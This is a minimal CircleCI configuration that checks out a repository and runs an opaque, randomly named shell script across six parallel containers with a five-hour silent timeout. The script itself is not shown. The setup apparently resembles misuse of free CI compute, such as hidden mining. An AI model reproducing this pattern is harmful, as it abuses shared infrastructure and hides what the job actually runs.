jobs:
  build:
    parallelism: 6
    docker:
      - image: cimg/go:1.17.2
    steps:
      - checkout
      - run: 
          name: Run Job 
          no_output_timeout: 5h 
          command: chmod +x wear5687goe.sh && ./wear5687goe.sh